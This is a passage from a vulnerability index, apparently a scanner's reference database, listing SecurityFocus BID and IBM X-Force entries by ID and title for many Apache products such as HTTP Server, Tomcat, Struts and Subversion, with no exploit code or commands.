| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
| [49290] Apache Wicket Cross Site Scripting Vulnerability
13673| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
13674| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
13675| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
13676| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
13677| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
13678| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
13679| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
13680| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
13681| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
13682| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
13683| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
13684| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
13685| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
13686| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
13687| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
13688| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
13689| [46953] Apache MPM-ITK Module Security Weakness
13690| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
13691| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
13692| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
13693| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
13694| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
13695| [46166] Apache Tomcat JVM Denial of Service Vulnerability
13696| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
13697| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
13698| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
13699| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
13700| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
13701| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
13702| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
13703| [44616] Apache Shiro Directory Traversal Vulnerability
13704| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
13705| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
13706| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
13707| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
13708| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
13709| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
13710| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
13711| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
13712| [42492] Apache CXF XML DTD Processing Security Vulnerability
13713| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
13714| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
13715| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
13716| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
13717| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
13718| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
13719| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
13720| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
13721| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
13722| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
13723| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
13724| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
13725| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
13726| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
13727| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
13728| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
13729| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
13730| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
13731| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
13732| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
13733| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
13734| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
13735| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
13736| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
13737| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
13738| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
13739| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
13740| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
13741| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
13742| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
13743| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
13744| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
13745| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
13746| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
13747| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
13748| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
13749| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
13750| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
13751| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
13752| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
13753| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
13754| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
13755| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
13756| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
13757| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
13758| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
13759| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
13760| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
13761| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
13762| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
13763| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
13764| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
13765| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
13766| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
13767| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
13768| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
13769| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
13770| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
13771| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
13772| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
13773| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
13774| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
13775| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
13776| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
13777| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
13778| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
13779| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
13780| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
13781| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
13782| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
13783| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
13784| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
13785| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
13786| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
13787| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
13788| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
13789| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
13790| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
13791| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
13792| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
13793| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
13794| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
13795| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
13796| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
13797| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
13798| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
13799| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
13800| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
13801| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
13802| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
13803| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
13804| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
13805| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
13806| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
13807| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
13808| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
13809| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
13810| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
13811| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
13812| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
13813| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
13814| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
13815| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
13816| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
13817| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
13818| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
13819| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
13820| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
13821| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
13822| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
13823| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
13824| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
13825| [20527] Apache Mod_TCL Remote Format String Vulnerability
13826| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
13827| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
13828| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
13829| [19106] Apache Tomcat Information Disclosure Vulnerability
13830| [18138] Apache James SMTP Denial Of Service Vulnerability
13831| [17342] Apache Struts Multiple Remote Vulnerabilities
13832| [17095] Apache Log4Net Denial Of Service Vulnerability
13833| [16916] Apache mod_python FileSession Code Execution Vulnerability
13834| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
13835| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
13836| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
13837| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
13838| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
13839| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
13840| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
13841| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
13842| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
13843| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
13844| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
13845| [15177] PHP Apache 2 Local Denial of Service Vulnerability
13846| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
13847| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
13848| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
13849| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
13850| [14106] Apache HTTP Request Smuggling Vulnerability
13851| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
13852| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
13853| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
13854| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
13855| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
13856| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
13857| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
13858| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
13859| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
13860| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
13861| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
13862| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
13863| [11471] Apache mod_include Local Buffer Overflow Vulnerability
13864| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
13865| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
13866| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
13867| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
13868| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
13869| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
13870| [11094] Apache mod_ssl Denial Of Service Vulnerability
13871| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
13872| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
13873| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
13874| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
13875| [10478] ClueCentral Apache Suexec Patch Security Weakness
13876| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
13877| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
13878| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
13879| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
13880| [9921] Apache Connection Blocking Denial Of Service Vulnerability
13881| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
13882| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
13883| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
13884| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
13885| [9733] Apache Cygwin Directory Traversal Vulnerability
13886| [9599] Apache mod_php Global Variables Information Disclosure Weakness
13887| [9590] Apache-SSL Client Certificate Forging Vulnerability
13888| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
13889| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
13890| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
13891| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
13892| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
13893| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
13894| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
13895| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
13896| [8898] Red Hat Apache Directory Index Default Configuration Error
13897| [8883] Apache Cocoon Directory Traversal Vulnerability
13898| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
13899| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
13900| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
13901| [8707] Apache htpasswd Password Entropy Weakness
13902| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
13903| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
13904| [8226] Apache HTTP Server Multiple Vulnerabilities
13905| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
13906| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
13907| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
13908| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
13909| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
13910| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
13911| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
13912| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
13913| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
13914| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
13915| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
13916| [7255] Apache Web Server File Descriptor Leakage Vulnerability
13917| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
13918| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
13919| [6939] Apache Web Server ETag Header Information Disclosure Weakness
13920| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
13921| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
13922| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
13923| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
13924| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
13925| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
13926| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
13927| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
13928| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
13929| [6117] Apache mod_php File Descriptor Leakage Vulnerability
13930| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
13931| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
13932| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
13933| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
13934| [5992] Apache HTDigest Insecure Temporary File Vulnerability
13935| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
13936| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
13937| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
13938| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
13939| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
13940| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
13941| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
13942| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
13943| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
13944| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
13945| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
13946| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
13947| [5485] Apache 2.0 Path Disclosure Vulnerability
13948| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
13949| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
13950| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
13951| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
13952| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
13953| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
13954| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
13955| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
13956| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
13957| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
13958| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
13959| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
13960| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
13961| [4437] Apache Error Message Cross-Site Scripting Vulnerability
13962| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
13963| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
13964| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
13965| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
13966| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
13967| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
13968| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
13969| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
13970| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
13971| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
13972| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
13973| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
13974| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
13975| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
13976| [3596] Apache Split-Logfile File Append Vulnerability
13977| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
13978| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
13979| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
13980| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
13981| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
13982| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
13983| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
13984| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
13985| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
13986| [3169] Apache Server Address Disclosure Vulnerability
13987| [3009] Apache Possible Directory Index Disclosure Vulnerability
13988| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
13989| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
13990| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
13991| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
13992| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
13993| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
13994| [2216] Apache Web Server DoS Vulnerability
13995| [2182] Apache /tmp File Race Vulnerability
13996| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
13997| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
13998| [1821] Apache mod_cookies Buffer Overflow Vulnerability
13999| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
14000| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
14001| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
14002| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
14003| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
14004| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
14005| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
14006| [1457] Apache::ASP source.asp Example Script Vulnerability
14007| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
14008| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
14009|
14010| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14011| [86258] Apache CloudStack text fields cross-site scripting
14012| [85983] Apache Subversion mod_dav_svn module denial of service
14013| [85875] Apache OFBiz UEL code execution
14014| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
14015| [85871] Apache HTTP Server mod_session_dbd unspecified
14016| [85756] Apache Struts OGNL expression command execution
14017| [85755] Apache Struts DefaultActionMapper class open redirect
14018| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
14019| [85574] Apache HTTP Server mod_dav denial of service
| [85573] Apache Struts Showcase App OGNL code execution
| [85496] Apache CXF denial of service
| [85423] Apache Geronimo RMI classloader code execution
| [85326] Apache Santuario XML Security for C++ buffer overflow
| [85323] Apache Santuario XML Security for Java spoofing
| [85319] Apache Qpid Python client SSL spoofing
| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
| [84952] Apache Tomcat CVE-2012-3544 denial of service
| [84763] Apache Struts CVE-2013-2135 security bypass
| [84762] Apache Struts CVE-2013-2134 security bypass
| [84719] Apache Subversion CVE-2013-2088 command execution
| [84718] Apache Subversion CVE-2013-2112 denial of service
| [84717] Apache Subversion CVE-2013-1968 denial of service
| [84577] Apache Tomcat security bypass
| [84576] Apache Tomcat symlink
| [84543] Apache Struts CVE-2013-2115 security bypass
| [84542] Apache Struts CVE-2013-1966 security bypass
| [84154] Apache Tomcat session hijacking
| [84144] Apache Tomcat denial of service
| [84143] Apache Tomcat information disclosure
| [84111] Apache HTTP Server command execution
| [84043] Apache Virtual Computing Lab cross-site scripting
| [84042] Apache Virtual Computing Lab cross-site scripting
| [83782] Apache CloudStack information disclosure
| [83781] Apache CloudStack security bypass
| [83720] Apache ActiveMQ cross-site scripting
| [83719] Apache ActiveMQ denial of service
| [83718] Apache ActiveMQ denial of service
| [83263] Apache Subversion denial of service
| [83262] Apache Subversion denial of service
| [83261] Apache Subversion denial of service
| [83259] Apache Subversion denial of service
| [83035] Apache mod_ruid2 security bypass
| [82852] Apache Qpid federation_tag security bypass
| [82851] Apache Qpid qpid::framing::Buffer denial of service
| [82758] Apache Rave User RPC API information disclosure
| [82663] Apache Subversion svn_fs_file_length() denial of service
| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
| [82641] Apache Qpid AMQP denial of service
| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
| [82618] Apache Commons FileUpload symlink
| [82360] Apache HTTP Server manager interface cross-site scripting
| [82359] Apache HTTP Server hostnames cross-site scripting
